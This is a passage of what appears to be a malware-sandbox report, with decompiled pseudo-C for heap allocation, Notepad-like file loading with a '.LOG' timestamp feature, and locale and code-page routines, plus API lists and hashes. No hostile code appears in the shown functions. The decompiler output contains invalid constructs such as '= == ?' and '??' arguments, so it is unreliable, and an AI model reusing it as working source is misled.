					while(1) {
						_t8 = RtlAllocateHeap( *0x44ce74, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00410081();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00420E3C())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E0042B0C3(__eflags, _t19);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}








                                                      0x004108d3
                                                      0x004108d8
                                                      0x004108e6
                                                      0x004108e6
                                                      0x004108ec
                                                      0x004108ee
                                                      0x004108ee
                                                      0x00410905
                                                      0x0041090e
                                                      0x00410916
                                                      0x00000000
                                                      0x00000000
                                                      0x004108f6
                                                      0x004108f8
                                                      0x0041091a
                                                      0x0041091f
                                                      0x00410925
                                                      0x00000000
                                                      0x00410925
                                                      0x004108fb
                                                      0x00410901
                                                      0x00410903
                                                      0x00000000
                                                      0x00000000
                                                      0x00410903
                                                      0x00000000
                                                      0x00410905
                                                      0x004108de
                                                      0x004108e4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,0042004C,00000001,00000364,00000000,0000000B,000000FF,?,004103CD,00000000,00000000), ref: 0041090E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 5695579b55240e50b80722c7c8c730456fd5f53a58d87948a6bb0900e523b1f5
                                                      • Instruction ID: fb607b80775a59f004c297760bc55bb20d08804f6f9fed1bb9146b39a17d01c0
                                                      • Opcode Fuzzy Hash: 5695579b55240e50b80722c7c8c730456fd5f53a58d87948a6bb0900e523b1f5
                                                      • Instruction Fuzzy Hash: 0AF0B43175512866FB222F229C11BDB778CAF427B4B194127AC1996292CBFCDDC186EC
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 004010F4 Relevance: 51.0, APIs: 28, Strings: 1, Instructions: 218memorywindowfileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E004010F4(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				int _v16;
				short _v28;
				void* _t23;
				int _t25;
				long _t26;
				int _t31;
				void* _t34;
				signed int _t35;
				int _t53;
				void _t61;
				void* _t62;
				void* _t64;
				int _t66;
				long _t68;
				int _t71;
				void* _t72;
				short _t73;
				void* _t77;
				void* _t81;
				void* _t83;
				void* _t87;

				_t64 = __edx;
				_t23 = E0040104D();
				if(_t23 == 0) {
					return _t23;
				}
				_t25 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0x80, 0);
				_t81 = _t25;
				if(_t81 == 0xffffffff) {
					L34:
					return _t25;
				}
				_t26 = GetFileSize(_t81, 0);
				_v8 = _t26;
				if(_t26 == 0xffffffff) {
					L4:
					_t25 = CloseHandle(_t81);
					goto L34;
				}
				_t87 = HeapAlloc(GetProcessHeap(), 0, _t26 + 2);
				if(_t87 != 0) {
					_t31 = ReadFile(_t81, _t87, _v8,  &_v12, 0);
					_push(_t81);
					if(_t31 != 0) {
						CloseHandle();
						_t71 = _v12;
						_v8 = _t71;
						if(_t64 != 0xffffffff) {
							_t77 = 2;
							if(_t71 >= _t77 && (_t64 == 1 || _t64 == _t77)) {
								_t61 =  *_t87;
								if(_t61 != 0xff ||  *((char*)(_t87 + 1)) != 0xfe) {
									if(_t61 == 0xfe) {
										_t64 =  ==  ? _t77 : _t64;
									}
								} else {
									_t64 = 1;
								}
							}
						} else {
							_t62 = E004010A1(_t87, _t71);
							_t71 = _v8;
							_t64 = _t62;
						}
						_t34 = _t64 - 1;
						if(_t34 == 0 || _t34 == 1) {
							_t83 = _t87;
							_t66 = _t71 >> 1;
							goto L23;
						} else {
							_t53 =  ==  ? 0xfde9 : 0;
							_v16 = _t53;
							_t66 = MultiByteToWideChar(_t53, 0, _t87, _t71, 0, 0);
							_t83 = HeapAlloc(GetProcessHeap(), 0, 2 + _t66 * 2);
							if(_t83 != 0) {
								MultiByteToWideChar(_v16, 0, _t87, _v8, _t83, _t66);
								HeapFree(GetProcessHeap(), 0, _t87);
								L23:
								_t72 = 0;
								_t35 = 0;
								if(_t66 <= 0) {
									L27:
									 *((short*)(_t83 + _t66 * 2)) = 0;
									if(_t66 < 1 ||  *_t83 != 0xfeff) {
										_push(_t83);
									} else {
										_t20 = _t83 + 2; // 0x2
									}
									SetWindowTextW( *0x44cf0c, ??);
									HeapFree(GetProcessHeap(), 0, _t83);
									SendMessageW( *0x44cf0c, 0xb9, 0, 0);
									SendMessageW( *0x44cf0c, 0xcd, 0, 0);
									SetFocus( *0x44cf0c);
									_t25 = GetWindowTextW( *0x44cf0c,  &_v28, 0);
									if(_t25 != 0) {
										_t25 = lstrcmpW( &_v28, L".LOG");
										if(_t25 == 0) {
											SendMessageW( *0x44cf0c, 0xb1, GetWindowTextLengthW( *0x44cf0c), 0xffffffff);
											_t68 = L"\r\n";
											SendMessageW( *0x44cf0c, 0xc2, 1, _t68);
											E00401E6F();
											_t25 = SendMessageW( *0x44cf0c, 0xc2, 1, _t68);
										}
									}
									goto L34;
								} else {
									goto L24;
								}
								do {
									L24:
									if( *((intOrPtr*)(_t83 + _t35 * 2)) == _t72) {
										_t73 = 0x20;
										 *((short*)(_t83 + _t35 * 2)) = _t73;
										_t72 = 0;
									}
									_t35 = _t35 + 1;
								} while (_t35 < _t66);
								goto L27;
							}
							goto L20;
						}
					} else {
						CloseHandle();
						L20:
						_t25 = HeapFree(GetProcessHeap(), 0, _t87);
						goto L34;
					}
				}
				goto L4;
			}


























                                                      0x004010fc
                                                      0x00401100
                                                      0x00401107
                                                      0x00401352
                                                      0x00401352
                                                      0x00401121
                                                      0x00401127
                                                      0x0040112c
                                                      0x0040134c
                                                      0x00000000
                                                      0x0040134c
                                                      0x00401135
                                                      0x0040113b
                                                      0x00401141
                                                      0x0040115c
                                                      0x0040115d
                                                      0x00000000
                                                      0x0040115d
                                                      0x00401156
                                                      0x0040115a
                                                      0x00401173
                                                      0x00401179
                                                      0x0040117c
                                                      0x00401189
                                                      0x0040118f
                                                      0x00401192
                                                      0x00401198
                                                      0x004011ac
                                                      0x004011af
                                                      0x004011ba
                                                      0x004011be
                                                      0x004011cd
                                                      0x004011d3
                                                      0x004011d3
                                                      0x004011c6
                                                      0x004011c8
                                                      0x004011c8
                                                      0x004011be
                                                      0x0040119a
                                                      0x0040119e
                                                      0x004011a3
                                                      0x004011a6
                                                      0x004011a6
                                                      0x004011d8
                                                      0x004011db
                                                      0x00401258
                                                      0x0040125a
                                                      0x00000000
                                                      0x004011e2
                                                      0x004011ec
                                                      0x004011f7
                                                      0x00401200
                                                      0x00401218
                                                      0x0040121c
                                                      0x0040123e
                                                      0x0040124e
                                                      0x0040125c
                                                      0x0040125c
                                                      0x0040125e
                                                      0x00401262
                                                      0x00401278
                                                      0x0040127a
                                                      0x00401281
                                                      0x00401293
                                                      0x0040128d
                                                      0x0040128d
                                                      0x00401290
                                                      0x0040129a
                                                      0x004012ab
                                                      0x004012c4
                                                      0x004012d3
                                                      0x004012db
                                                      0x004012ec
                                                      0x004012f4
                                                      0x004012ff
                                                      0x00401307
                                                      0x00401323
                                                      0x00401325
                                                      0x00401339
                                                      0x0040133b
                                                      0x0040134a
                                                      0x0040134a
                                                      0x00401307
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00401264
                                                      0x00401264
                                                      0x00401268
                                                      0x0040126c
                                                      0x0040126d
                                                      0x00401271
                                                      0x00401271
                                                      0x00401273
                                                      0x00401274
                                                      0x00000000
                                                      0x00401264
                                                      0x00000000
                                                      0x0040121c
                                                      0x0040117e
                                                      0x0040117e
                                                      0x0040121e
                                                      0x00401228
                                                      0x00000000
                                                      0x00401228
                                                      0x0040117c
                                                      0x00000000

                                                      APIs
                                                        • Part of subcall function 0040104D: GetWindowTextLengthW.USER32(00000001), ref: 00401054
                                                        • Part of subcall function 0040104D: SendMessageW.USER32(000000B8,00000000,00000000), ref: 0040106B
                                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00401121
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00401135
                                                      • GetProcessHeap.KERNEL32(00000000,-00000002,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00401149
                                                      • HeapAlloc.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00401150
                                                      • CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0040115D
                                                      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00401173
                                                      • CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0040117E
                                                      • CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00401189
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004011FA
                                                      • GetProcessHeap.KERNEL32(00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0040120B
                                                      • HeapAlloc.KERNEL32(00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00401212
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00401221
                                                      • HeapFree.KERNEL32(00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00401228
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0040123E
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00401247
                                                      • HeapFree.KERNEL32(00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0040124E
                                                      • SetWindowTextW.USER32(00000000), ref: 0040129A
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004012A4
                                                      • HeapFree.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004012AB
                                                      • SendMessageW.USER32(000000B9,00000000,00000000), ref: 004012C4
                                                      • SendMessageW.USER32(000000CD,00000000,00000000), ref: 004012D3
                                                        • Part of subcall function 004010A1: IsTextUnicode.ADVAPI32(?,?,?), ref: 004010D3
                                                      • SetFocus.USER32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004012DB
                                                      • GetWindowTextW.USER32 ref: 004012EC
                                                      • lstrcmpW.KERNEL32(?,.LOG,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004012FF
                                                      • GetWindowTextLengthW.USER32(000000FF), ref: 00401311
                                                      • SendMessageW.USER32(000000B1,00000000,?,80000000), ref: 00401323
                                                      • SendMessageW.USER32(000000C2,00000001,00447ADC), ref: 00401339
                                                        • Part of subcall function 00401E6F: GetLocalTime.KERNEL32(00000000,000000C2,775DBB20,00447ADC), ref: 00401E7F
                                                        • Part of subcall function 00401E6F: GetTimeFormatW.KERNEL32(00000400,00000002,00000000,00000000,?,000000FF), ref: 00401E9F
                                                        • Part of subcall function 00401E6F: SendMessageW.USER32(000000C2,00000001,?), ref: 00401EC0
                                                        • Part of subcall function 00401E6F: SendMessageW.USER32(000000C2,00000001,00447B0C), ref: 00401ED0
                                                        • Part of subcall function 00401E6F: GetDateFormatW.KERNEL32(00000400,00000000,00000000,00000000,?,000000FF), ref: 00401EE7
                                                        • Part of subcall function 00401E6F: SendMessageW.USER32(000000C2,00000001,?), ref: 00401EFD
                                                      • SendMessageW.USER32(000000C2,00000001,00447ADC), ref: 0040134A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: Heap$MessageSend$ProcessText$Window$CloseFileFreeHandle$AllocByteCharFormatLengthMultiTimeWide$CreateDateFocusLocalReadSizeUnicodelstrcmp
                                                      • String ID: .LOG
                                                      • API String ID: 3627538612-2272326732
                                                      • Opcode ID: 61c27b2f3326b0a23fe5e1f8f63cfbd7fedbd5e418dbbab50b8a7725fe4447ce
                                                      • Instruction ID: df94c668a430cca5cc55775fa9f65808ab366d91416bcd41b29e439e4c5fd107
                                                      • Opcode Fuzzy Hash: 61c27b2f3326b0a23fe5e1f8f63cfbd7fedbd5e418dbbab50b8a7725fe4447ce
                                                      • Instruction Fuzzy Hash: 6B61A279601205BFEB245BB5AC88E6B3A6DEB46710F10423AFB05E62F0DB798C11C75D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004293C1 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 251COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 70%
                                                      			E004293C1(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t69;
				void* _t73;
				void* _t74;
				void* _t78;
				intOrPtr* _t85;
				short* _t88;
				intOrPtr* _t93;
				intOrPtr* _t97;
				short _t115;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t120;
				signed int* _t121;
				intOrPtr* _t124;
				signed short _t126;
				int _t128;
				void* _t132;
				signed int _t133;

				_push(__ecx);
				_push(__ecx);
				_push(__esi);
				_push(__edi);
				_t118 = _a4;
				_t33 = E0041FEAE(__ecx, __edx, __esi);
				_t115 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t124 = _t3;
				_t4 = _t124 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t124 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t124 + 4; // 0x54
				_t85 = _t6;
				_v8 = _t34;
				_t93 = _t118;
				_t35 = _t118 + 0x80;
				 *_t124 = _t118;
				 *_t85 = _t35;
				if( *_t35 != 0) {
					E00429354(0x442c58, 0x16, _t85);
					_t93 =  *_t124;
					_t132 = _t132 + 0xc;
					_t115 = 0;
				}
				_push(_t124);
				if( *_t93 == _t115) {
					E00428C7F(_t93);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t85)) == _t115) {
						E00428D9F();
					} else {
						E00428D06(_t93);
					}
					if( *((intOrPtr*)(_t124 + 8)) == 0) {
						_t78 = E00429354("p-D", 0x40, _t124);
						_t132 = _t132 + 0xc;
						if(_t78 != 0) {
							_push(_t124);
							if( *((intOrPtr*)( *_t85)) == 0) {
								E00428D9F();
							} else {
								E00428D06(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t124 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t118 + 0x100;
					if( *_t118 != 0 ||  *_t38 != 0) {
						_t39 = E004291CB(_t38, _t124);
					} else {
						_t39 = GetACP();
					}
					_t126 = _t39;
					if(_t126 == 0 || _t126 == 0xfde8 || IsValidCodePage(_t126 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t126;
						}
						_t120 = _a12;
						if(_t120 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t97 = _v8;
							_t15 = _t120 + 0x120; // 0xd0
							_t88 = _t15;
							 *_t88 = 0;
							_t16 = _t97 + 2; // 0x2
							_t116 = _t16;
							do {
								_t45 =  *_t97;
								_t97 = _t97 + 2;
							} while (_t45 != _v12);
							_t18 = (_t97 - _t116 >> 1) + 1; // -1
							_t47 = E00423AF8(_t97 - _t116 >> 1, _t88, 0x55, _v8);
							_t133 = _t132 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E0041F197();
								asm("int3");
								_t131 = _t133;
								_t50 =  *0x44b018; // 0x1989d38f
								_v52 = _t50 ^ _t133;
								_push(_t88);
								_push(_t126);
								_t127 = _v40;
								_push(_t120);
								_t52 = E0041FEAE(_t99, _t116, _v40);
								_t89 = _t52;
								_t121 =  *(E0041FEAE(_t99, _t116, _v40) + 0x34c);
								_t128 = E00429B1A(_t127);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t128, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E004306E1(_t121, _t128,  *((intOrPtr*)(_t89 + 0x54)),  &_v272) == 0 && E00429C4F(_t128) != 0) {
										 *_t121 =  *_t121 | 0x00000004;
										_t121[2] = _t128;
										_t121[1] = _t128;
									}
								} else {
									 *_t121 =  *_t121 & _t56;
								}
								return E0040361D(_v32 ^ _t131);
							} else {
								if(E0042A982(_t88, 0x1001, _t120, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t120 + 0x80; // 0x30
									_t88 = _t20;
									_t21 = _t120 + 0x120; // 0xd0
									if(E0042A982(_t21, 0x1002, _t88, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t69 = E0043F39B(_t99);
										_t99 = _t88;
										if(_t69 != 0) {
											L31:
											_t22 = _t120 + 0x120; // 0xd0
											if(E0042A982(_t22, 7, _t88, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t74 = E0043F39B(_t99);
											_t99 = _t88;
											if(_t74 == 0) {
												L32:
												_t120 = _t120 + 0x100;
												if(_t126 != 0xfde9) {
													E00422790(_t99, _t126, _t120, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t73 = E00423AF8(_t99, _t120, 0x10, L"utf8");
													_t133 = _t133 + 0x10;
													if(_t73 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}









































                                                      0x004293c6
                                                      0x004293c7
                                                      0x004293c9
                                                      0x004293ca
                                                      0x004293cb
                                                      0x004293ce
                                                      0x004293d5
                                                      0x004293d7
                                                      0x004293da
                                                      0x004293da
                                                      0x004293dd
                                                      0x004293dd
                                                      0x004293e3
                                                      0x004293e6
                                                      0x004293e9
                                                      0x004293e9
                                                      0x004293ec
                                                      0x004293ef
                                                      0x004293f1
                                                      0x004293f7
                                                      0x004293f9
                                                      0x004293fe
                                                      0x00429408
                                                      0x0042940d
                                                      0x0042940f
                                                      0x00429412
                                                      0x00429412
                                                      0x00429414
                                                      0x00429418
                                                      0x00429461
                                                      0x00000000
                                                      0x0042941a
                                                      0x0042941f
                                                      0x00429428
                                                      0x00429421
                                                      0x00429421
                                                      0x00429421
                                                      0x00429433
                                                      0x0042943d
                                                      0x00429442
                                                      0x00429447
                                                      0x0042944d
                                                      0x00429451
                                                      0x0042945a
                                                      0x00429453
                                                      0x00429453
                                                      0x00429453
                                                      0x00429466
                                                      0x00429466
                                                      0x00429447
                                                      0x00429433
                                                      0x0042946c
                                                      0x004295a8
                                                      0x004295a8
                                                      0x00000000
                                                      0x00429472
                                                      0x00429472
                                                      0x0042947b
                                                      0x0042948c
                                                      0x00429482
                                                      0x00429482
                                                      0x00429482
                                                      0x00429493
                                                      0x00429497
                                                      0x00000000
                                                      0x004294bb
                                                      0x004294bb
                                                      0x004294c0
                                                      0x004294c2
                                                      0x004294c2
                                                      0x004294c4
                                                      0x004294c9
                                                      0x004295a3
                                                      0x004295a5
                                                      0x004295aa
                                                      0x004295ae
                                                      0x004294cf
                                                      0x004294cf
                                                      0x004294d2
                                                      0x004294d2
                                                      0x004294da
                                                      0x004294dd
                                                      0x004294dd
                                                      0x004294e0
                                                      0x004294e0
                                                      0x004294e3
                                                      0x004294e6
                                                      0x004294f0
                                                      0x004294fa
                                                      0x004294ff
                                                      0x00429504
                                                      0x004295af
                                                      0x004295b1
                                                      0x004295b2
                                                      0x004295b3
                                                      0x004295b4
                                                      0x004295b5
                                                      0x004295b6
                                                      0x004295bb
                                                      0x004295bf
                                                      0x004295c7
                                                      0x004295ce
                                                      0x004295d1
                                                      0x004295d2
                                                      0x004295d3
                                                      0x004295d6
                                                      0x004295d7
                                                      0x004295dc
                                                      0x004295e4
                                                      0x004295f3
                                                      0x004295ff
                                                      0x00429610
                                                      0x00429618
                                                      0x00429632
                                                      0x0042963f
                                                      0x00429642
                                                      0x00429645
                                                      0x00429645
                                                      0x0042961a
                                                      0x0042961a
                                                      0x0042961c
                                                      0x00429660
                                                      0x0042950a
                                                      0x0042951a
                                                      0x00000000
                                                      0x00429520
                                                      0x00429522
                                                      0x00429522
                                                      0x0042952e
                                                      0x0042953c
                                                      0x00000000
                                                      0x0042953e
                                                      0x0042953e
                                                      0x00429541
                                                      0x00429547
                                                      0x0042954a
                                                      0x0042955a
                                                      0x0042955f
                                                      0x0042956d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0042954c
                                                      0x0042954c
                                                      0x0042954f
                                                      0x00429555
                                                      0x00429558
                                                      0x0042956f
                                                      0x0042956f
                                                      0x0042957b
                                                      0x0042959b
                                                      0x00000000
                                                      0x0042957d
                                                      0x0042957d
                                                      0x00429587
                                                      0x0042958c
                                                      0x00429591
                                                      0x00000000
                                                      0x00429593
                                                      0x00000000
                                                      0x00429593
                                                      0x00429591
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00429558
                                                      0x0042954a
                                                      0x0042953c
                                                      0x0042951a
                                                      0x00429504
                                                      0x004294c9
                                                      0x00429497

                                                      APIs
                                                        • Part of subcall function 0041FEAE: GetLastError.KERNEL32(?,00000008,0042383F), ref: 0041FEB2
                                                        • Part of subcall function 0041FEAE: SetLastError.KERNEL32(00000000), ref: 0041FF54
                                                      • GetACP.KERNEL32(?,?,?,?,?,?,0040EE33,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00429482
                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0040EE33,?,?,?,00000055,?,-00000050,?,?), ref: 004294AD
                                                      • _wcschr.LIBVCRUNTIME ref: 00429541
                                                      • _wcschr.LIBVCRUNTIME ref: 0042954F
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00429610
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                      • String ID: p-D$utf8
                                                      • API String ID: 4147378913-3542889350
                                                      • Opcode ID: 2d8f8ecf8e5b8d2bb65e43f198441480cdf9d7403bb52a1b54beb3f99c47e633
                                                      • Instruction ID: b67d116295a48db25a5cd56fab27c09112342427834d9f8f91643f1d47553766
                                                      • Opcode Fuzzy Hash: 2d8f8ecf8e5b8d2bb65e43f198441480cdf9d7403bb52a1b54beb3f99c47e633
                                                      • Instruction Fuzzy Hash: 12712872700321AADB24AB36EC42BAB73A8AF45304F54042BF905D7281EB7CED45866D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00429D43 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 87%
                                                      			E00429D43(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, signed short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				signed short* _v28;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				signed int _t48;
				int _t49;
				signed short* _t57;
				signed int _t71;
				intOrPtr _t74;
				void* _t76;
				signed int _t77;
				intOrPtr _t84;
				short* _t88;
				signed int _t91;
				signed int* _t102;
				void* _t103;
				signed int _t105;
				signed short _t108;
				signed int _t109;
				void* _t110;

				_t39 =  *0x44b018; // 0x1989d38f
				_v8 = _t39 ^ _t109;
				_t88 = _a12;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = E0041FEAE(__ecx, __edx, _t105) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E0041FEAE(__ecx, __edx, _t105);
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t91 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t102 =  &(_t46[1]);
				 *_t102 = _t91;
				if(_t91 != 0 &&  *_t91 != 0) {
					_t84 =  *0x442d6c; // 0x17
					E00429CE2(_t91, 0, 0x442c58, _t84 - 1, _t102);
					_t46 = _v24;
					_t110 = _t110 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					if(_t48 == 0 ||  *_t48 == _t99) {
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
					} else {
						E00429663(_t91, _t99,  &_v20);
						_pop(_t91);
					}
					goto L20;
				} else {
					_t71 =  *_t102;
					if(_t71 == 0 ||  *_t71 == _t99) {
						E00429767(_t91, _t99,  &_v20);
					} else {
						E004296CC(_t91, _t99,  &_v20);
					}
					_pop(_t91);
					if(_v20 != 0) {
						_t103 = 0;
						goto L25;
					} else {
						_t74 =  *0x442c54; // 0x41
						_t76 = E00429CE2(_t91, _t99, "p-D", _t74 - 1, _v24);
						_t110 = _t110 + 0xc;
						if(_t76 == 0) {
							L20:
							_t103 = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t108 = E00429B6E(_t91,  ~_t105 & _t105 + 0x00000100,  &_v20);
								if(_t108 == 0 || IsValidCodePage(_t108 & 0x0000ffff) == 0 || IsValidLocale(_v16, 1) == 0) {
									goto L22;
								} else {
									_t57 = _v28;
									if(_t57 != 0) {
										 *_t57 = _t108;
									}
									E0042AB44(_v16,  &(_v24[0x94]), 0x55, _t103);
									if(_t88 == 0) {
										L34:
										L23:
										return E0040361D(_v8 ^ _t109);
									} else {
										_t33 =  &(_t88[0x90]); // 0xd0
										E0042AB44(_v16, _t33, 0x55, _t103);
										if(GetLocaleInfoW(_v16, 0x1001, _t88, 0x40) == 0) {
											goto L22;
										}
										_t36 =  &(_t88[0x40]); // 0x30
										if(GetLocaleInfoW(_v12, 0x1002, _t36, 0x40) == 0) {
											goto L22;
										}
										_t38 =  &(_t88[0x80]); // 0xb0
										E00422790(_t38, _t108, _t38, 0x10, 0xa);
										goto L34;
									}
								}
							}
							L22:
							goto L23;
						}
						_t77 =  *_t102;
						_t103 = 0;
						if(_t77 == 0 ||  *_t77 == 0) {
							E00429767(_t91, _t99,  &_v20);
						} else {
							E004296CC(_t91, _t99,  &_v20);
						}
						_pop(_t91);
						goto L21;
					}
				}
			}






























                                                      0x00429d4b
                                                      0x00429d52
                                                      0x00429d59
                                                      0x00429d5d
                                                      0x00429d61
                                                      0x00429d6f
                                                      0x00429d74
                                                      0x00429d75
                                                      0x00429d76
                                                      0x00429d77
                                                      0x00429d7f
                                                      0x00429d81
                                                      0x00429d87
                                                      0x00429d8d
                                                      0x00429d90
                                                      0x00429d92
                                                      0x00429d95
                                                      0x00429d99
                                                      0x00429da0
                                                      0x00429dad
                                                      0x00429db2
